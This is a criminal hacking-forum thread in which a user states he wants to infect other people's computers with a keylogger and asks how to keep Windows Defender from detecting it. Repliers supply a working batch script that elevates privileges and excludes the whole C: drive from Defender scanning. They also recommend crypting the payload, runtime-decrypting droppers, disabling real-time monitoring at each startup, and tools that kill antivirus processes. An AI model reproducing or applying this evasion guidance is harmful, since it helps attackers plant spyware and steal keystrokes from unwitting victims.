What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Bypass Windows Defender Only | Обход Windows Defender

deardexter

Midle Weight
Депозит
$0
hey guys quick question or you can say i need some help . I want to infect some computers with a keylogger i am using orion keylogger stub but the problem is that windows defender can easily detect the keylogger so can you please tell me a way how i can bypass windows defender and keep my stub active atleast 1 month

russian:
Привет, ребята, быстрый вопрос или вы можете сказать, что мне нужна помощь. Я хочу заразить некоторые компьютеры с помощью кейлоггера. Я использую заглушку orion кейлоггера, но проблема в том, что защитник Windows может легко обнаружить кейлоггер, поэтому не могли бы вы рассказать мне, как я могу обойти защитника Windows и сохранить свою заглушку активной по крайней мере 1 месяц
 
deardexter сказал(а):
hey guys quick question or you can say i need some help . I want to infect some computers with a keylogger i am using orion keylogger stub but the problem is that windows defender can easily detect the keylogger so can you please tell me a way how i can bypass windows defender and keep my stub active atleast 1 month

russian:
Привет, ребята, быстрый вопрос или вы можете сказать, что мне нужна помощь. Я хочу заразить некоторые компьютеры с помощью кейлоггера. Я использую заглушку orion кейлоггера, но проблема в том, что защитник Windows может легко обнаружить кейлоггер, поэтому не могли бы вы рассказать мне, как я могу обойти защитника Windows и сохранить свою заглушку активной по крайней мере 1 месяц

Используй криптосервисы, ну и на месяц наверно уж врятли
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Use a .bat file that adds exclusions to wd
 
Код:
Скопировать в буфер обмена
@echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( goto neptyn ) else ( goto godmuyiuin ) :neptyn echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :godmuyiuin pushd "%CD%" CD /D "%~dp0" powershell.exe -command Add-MpPreference -ExclusionPath C:\

Добавляем в .bat файл, запускать от админа, AВ не палит.
 
cutedemon сказал(а):
Код:
Скопировать в буфер обмена
@echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( goto neptyn ) else ( goto godmuyiuin ) :neptyn echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :godmuyiuin pushd "%CD%" CD /D "%~dp0" powershell.exe -command Add-MpPreference -ExclusionPath C:\

Добавляем в .bat файл, запускать от админа, AВ не палит.
Пожалуйста, обратите внимание, что пользователь заблокирован


In this case I think your malware must be fud scantime runtime before WD catch it! otherwise will be useless
 
cutedemon сказал(а):
Код:
Скопировать в буфер обмена
@echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( goto neptyn ) else ( goto godmuyiuin ) :neptyn echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :godmuyiuin pushd "%CD%" CD /D "%~dp0" powershell.exe -command Add-MpPreference -ExclusionPath C:\

Add to .bat file, run as admin, AB does not fire.

okie thanks for this i will try this
 
JinnX93 сказал(а):
In this case I think your malware must be fud scantime runtime before WD catch it! otherwise will be useless

my victims are very foolish they will never run a scan or use antivirus by themself
 
inspect it with ThreatCheck before. Also try extracting shellcode, encrypt shellcode, and deliver your payload via a dropper that decrypts at runtime. Maybe foliage or ekko sleep when not logging keystrokes (aka when your desired target window isnt open). Or just add exclusions or Set-MpPreference $DisableRealtimeMonitoring -true everytime computer starts up and double-check every 30mins or so. World is your oyster with this, Defender is trivial
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Contact me I do the bypass free for you
 
cutedemon сказал(а):
Код:
Скопировать в буфер обмена
@echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( goto neptyn ) else ( goto godmuyiuin ) :neptyn echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %* :"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin .vbs" del "%temp%\getadmin.vbs" exit /B :godmuyiuin pushd "%CD%" CD /D "%~dp0" powershell.exe -command Add-MpPreference -ExclusionPath C:\

We add the file to the .bat, run as administrator, AB does not fire.

works but needs admin cmd authorization, do you have another way
Последнее редактирование: 15.10.2023
 
pierre777reborn сказал(а):
doesnt work, do you have another way

GitHub - ZeroMemoryEx/Blackout: kill anti-malware protected processes ( BYOVD) (Microsoft Won )
kill anti-malware protected processes ( BYOVD) (Microsoft Won ) - ZeroMemoryEx/Blackout
github.com

GitHub - ZeroMemoryEx/Terminator: Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes
Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes - ZeroMemoryEx/Terminator
github.com
 
Пожалуйста, обратите внимание, что пользователь заблокирован
You need to crypt it then is the very simple solution for your problem
 
cutedemon сказал(а):
Код:
Скопировать в буфер обмена
@echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( goto neptyn ) else ( goto godmuyiuin ) :neptyn echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :godmuyiuin pushd "%CD%" CD /D "%~dp0" powershell.exe -command Add-MpPreference -ExclusionPath C:\

Добавляем в .bat файл, запускать от админа, AВ не палит.

works but needs admin cmd authorization :/
 
Top